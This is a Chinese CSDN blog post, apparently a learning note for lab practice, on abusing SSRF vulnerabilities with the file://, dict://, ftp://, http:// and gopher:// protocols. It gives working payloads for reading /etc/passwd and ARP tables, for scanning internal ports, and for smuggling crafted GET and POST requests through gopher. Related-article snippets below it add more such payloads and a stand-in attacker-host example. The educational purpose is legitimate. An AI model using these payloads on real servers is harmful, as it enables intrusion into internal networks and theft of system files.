SSRF漏洞伪协议学习

已于 2024-04-11 15:44:17 修改
阅读量1.8k 收藏 16
点赞数 19
文章标签: 学习
于 2024-04-07 22:06:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73927535/article/details/137438078
版权

在有SSRF漏洞的服务器或主机提供的网页中使用一些伪协议来获取内网信息。这里可能需要ssrf漏洞靶场来做实验。

一、file://

从文件系统中获取文件内容,格式为file://[文件路径]

file:///etc/passwd            读取文件passwd

file:///etc/hosts                显示当前操作系统网卡的IP

file:///proc/net/arp           显示arp缓存表(寻找内网其他主机)
file:///proc/net/fib _trie     显示当前网段路由信息

file:///proc/net/arp           显示arp缓存表(寻找内网其他主机) 

 我们可以配合Burp Suite的intruder模块轮询访问内网主机获取arp缓存判断有那些主机存活。

结果图中第4列全为0的就代表主机不存在或未开启。

二、dict://、ftp://

ftp://可用于网络端口扫描,效率相对较低

使用ftp://同样利用burpsuite对内网依次扫描

ftp扫描时间长,tcp连接成功但是请求内容识别不到仍不会回复。

dict://字典服务协议,访问字典资源,如dict://ip:6739/info。可用于:扫描端口、获取内网信息、爆破密码等。

dict:// +ip:端口+/TCP/IP数据

如扫描有那些主机开了80端口:dict://172.251.250.1:80,将IP地址最后一段设为payload变量依次扫描,根据Length判断是否返回数据,从而判断端口是否打开 ,利用不同的Payload同时扫描多个IP的多个端口。

三、http://

作用:常规URL形式,允许通过HTTP 1.0的GET方法,以只读访问文件或资源。

http://example.com
http://example.com/file.php?var1 =val1 &var2=val2
http://user:password@example.com
https://example.com
https://example.com/file.php?var1 =val1 &var2=val2
https://user:password@example.com

查找内网存活主机IP        file://
查找内网主机开放端口    dict://、ftp://
目录扫描                          http://

如内网htttp://172.250.250.4,通过目录扫描获取网站子页面,使用burp打开代理拦截页面发送至intruder,子页面为http://172.250.250.4/文件名+后缀,为文件名和后缀添加payload变量。

 

 

根据数据包大小判断是否有内容页面。可以增加扫描选项如php、zip、txt等。

四、gopher://

利用范围较广:GET提交、POST提交、redis、fastcgi、sql

基本格式:

gopher://<目标IP>:<端口>/<gopher-path>

 gopher协议默认端口为 70,web也需要加端口。

注意gopher请求不转发第一个字符,要使用下划线(或自己定义个符号)填充首位。

GET提交

需要保留头部信息:

1、路径:GET   /name.php?name=123   HTTP/1.1

2、目标地址:Host:172.250.250.4

gopher://172.250.250.4:80/_GET%20/name.php%3fname=123%20HTTP/1.1%0d%0AHost:%20172.250.250.4%0d%0A

注意添加端口号80和填充位
URL编码
空格        %20
问号        %3f
换行符        %0d%0A
1、问号(?)需要转码为URL编码,也就是%3f
2、回车换行要变为%0d%0a,但如果直接用工具转,可能只会有%0a
3、在HTTP包的最后要加%0d%0a(换行符),代表消息结束(具体可研究HTTP包结束)
4、URL编码改为大写,冒号注意英文冒号
5、如果使用BP发包需要进行两次url编码
6、GET提交最后需要增加一个换行符

POST提交

需要保留头部信息

1、POST

2、Host:

3、Content-Type:

4、Content-Length:

 使用工具将下面保留的内容进行两次URL编码,在bp或hackbar中post提交要两次URL编码,在浏览器栏中提交只进行一次URL编码。

POST /name.php HTTP/1.1
Host:172.250.250.4
Content-Type:application/x-www-form-urlencoded
Content-Length:8

name=123

注意: 

1、POST后面是要提交的文件名

2、Host为目标主机

3、类型要和提交的类型一致

4、长度为下面提交内容的具体长度

5、中间的空行不能少

gopher格式不变 

 gopher://172.250.250.4:80/_编码后的内容粘贴至此
m0_73927535
关注
SSRF中的URL的伪协议
m0_55754984的博客
09-10 2131
当我们发现SSRF漏洞后,首先要做的事情就是测试所有可用的URL伪协议 0x01 类型 file:/// dict:// sftp:// ldap:// tftp:// gopher:// file:// 这种URL Schema可以尝试从文件系统中获取文件: http://example.com/ssrf.php?url=file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini 如果该服务器
SSRF(3)伪协议读取文件&Gopher协议的利用
m0_64417923的博客
05-12 4167
一:Http、Dict和file等协议的利用 1,内网访问 所以构造: /?url=http://127.0.0.1/flag.php 得到: ctfhub{ce475b59a4baee959112777b} 2,伪协议读取文件 最经典的PHP伪协议就是file:///协议了,可以用来读取php源码 构造payload: /?url=file:///var/www/html/flag.php 得到: 在单击右键查看源代码: 得到flag: ctfh..
伪协议的使用方法(SSRF,XXE,文件包含)
qz362228的博客
06-12 1957
php://input——读取POST数据,用于执行php代码 file://伪协议——读取文件内容 phar://——读取压缩包文件内容 zip://——读取压缩包文件内容 . data://——以get方式提交数据,执行php代码。 二、文件包含 ,XXE,XSSRF利用伪协议的异同 SSRF ssrf利用伪协议 类型:...
【web渗透】SSRF漏洞超详细讲解
2401_84215240的博客
08-07 2002
SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)探测目标端口如果目标未开放探测的端口,则会立马产生回显如果对方开放了所探测的端口,页面将会一直处于加载中的状态。
SSRF伪协议
Lhy1963245411的博客
07-26 993
学习自从文件系统中获取文件内容,如file:///etc/passwd可用于端口扫描SSH文件传输协议或安全文件传输协议轻量级目录访问协议简单文件传输协议分布式文档传输协议。
SSRF中伪协议学习
csjjjd的博客
07-24 1157
2.dict伪协议 dict 协议最初是为 UNIX 和类 UNIX 系统设计的,用于从远程服务器上查询词典或字典内容。 在互联网上存在一些公共的 dict 服务器,允许用户通过 dict 协议查询广泛的词典资源。
WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
siu~
09-18 1872
1、SSRF-原理-外部资源加载 2、SSRF-利用-伪协议&无回显 3、SSRF-挖掘-业务功能&URL参数
SSRF漏洞file伪协议之[网鼎杯 2018]Fakebook1
qq_58970968的博客
07-06 1554
关于SSRF漏洞(服务器端伪造)参考SSRF漏洞原理攻击与防御(超详细总结)_零点敲代码的博客-CSDN博客_ssrf漏洞防御SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF攻击可能存在任何语言编写的应用,接下来将举例php中可能存在SSRF漏洞的函数。1、file_get_
Day57:WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
qq_61553520的博客
03-30 2040
小迪安全-Day57:WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
SSRF漏洞学习
qi_SJQ_的博客
01-02 999
1.原理及成因 ssrf:服务端请求伪造,这个漏洞危害其实挺大的,外网直接打到内网,利用一台服务器上的web服务进而访问内网其他资产信息。 SSRF 形成的原因:大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 简而言之就是无法外网直接访问内网的其他主机,就能这个存在ssrf的主机当跳板来实现访问内网。 2.危险函数 主要是curl()函数,不过别的类似可以利用协议引入的函数也可以,比如file_get_.
ssrf漏洞利用伪协议大全
最新发布
09-24
SSRF (Server-Side Request Forgery) 漏洞是一种网络安全问题,它允许攻击者通过服务器发起请求而不是客户端,进而访问到服务器可以访问的资源,包括但不限于内部网络、API、数据库等。利用伪协议是指攻击者采用非...
ssrf漏洞可用的伪协议有哪些
07-22
SSRF(Server-Side Request Forgery)漏洞中可用的一些常见伪协议包括: 1. file://: 用于读取本地文件系统中的文件,可以用来获取敏感信息。...在进行SSRF漏洞测试时,请确保遵守法律和道德规范,并获得适当的授权。
ssrf dict伪协议
08-09
攻击者可以通过构造dict伪协议的URL,将目标服务器发送到一个字典服务中,进而获取敏感信息或者执行未经授权的操作。例如,攻击者可以构造如下的URL: dict://attacker.com:80/getSensitiveData 在这个例子中,...
SSRF(服务器端请求伪造)
qq_56289291的博客
08-02 1690
服务器端请求伪造(SSRFServer-SideRequestForgery)是一个Web安全漏洞,指攻击者诱导服务器将HTTP请求发送到攻击者选择的一个目标上。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。例如通过127.0.0.1就能访问本机,192.168.*.*就能访问内网C段。...
SSRF—服务器请求伪造 漏洞详解
m0_69043895的博客
04-21 1877
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造,由服务端发起请求的一个网络攻击,一般用来在外网探测或攻击内网服务,其影响效果根据服务器用的函数不同,从而造成不同的影响。SSRF 形成的原因大都是由于服务端提供了从其他服务器获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。
ssrf 内网访问 伪协议 读取文件 端口扫描
qq_69100706的博客
08-12 469
SSRF(Server-Side Request Forgery,服务器侧请求伪造)是一种利用服务器发起网络请求的能力来攻击内网资源或执行其他恶意活动的技术。SSRF可以用于访问通常不可由外部直接访问的内网资源,读取文件,甚至进行端口扫描。
SSRF一—WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
zyw268的博客
03-25 388
黑盒WEB-业务功能&URL关键字。SSRF-原理&挖掘&利用&修复。白盒CTF-绕过&伪协议&审计点。
-----已搬运-------[BJDCTF 2nd]:文件探测 -- springf()注入漏洞 ---PHP伪协议文件读取 ---ssrf ----PHP代码审计----session密码算法绕过
Zero_Adam的博客
03-15 248
访问网页的时候,后面用#这个定位符可以使得后面的内容失效。 也可以用参数的形式使其失效 比如: q2必须以http://127.0.0.1/开头,不能包含flag顺序出现的字符,后面会拼接y1ng.txt,我们用#注释掉拼接信息,即传入参数http://127.0.0.1/admin.php#,最后执行http://127.0.0.1/admin.php#.y1ng.txt,或者用http://127.0.0.1/admin.php?,最后执行http://127.0.0.1/admin.php?.y1ng
网络安全进阶学习第四课——SSRF服务器请求伪造
p36273的博客
07-01 1140
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是指攻击者能够从易受攻击的Web应用程序发送精心设计的请求的对其他网站进行攻击。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统,也就是内网。利用一个可以发起网络请求的服务,当做跳板来攻击其它服务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值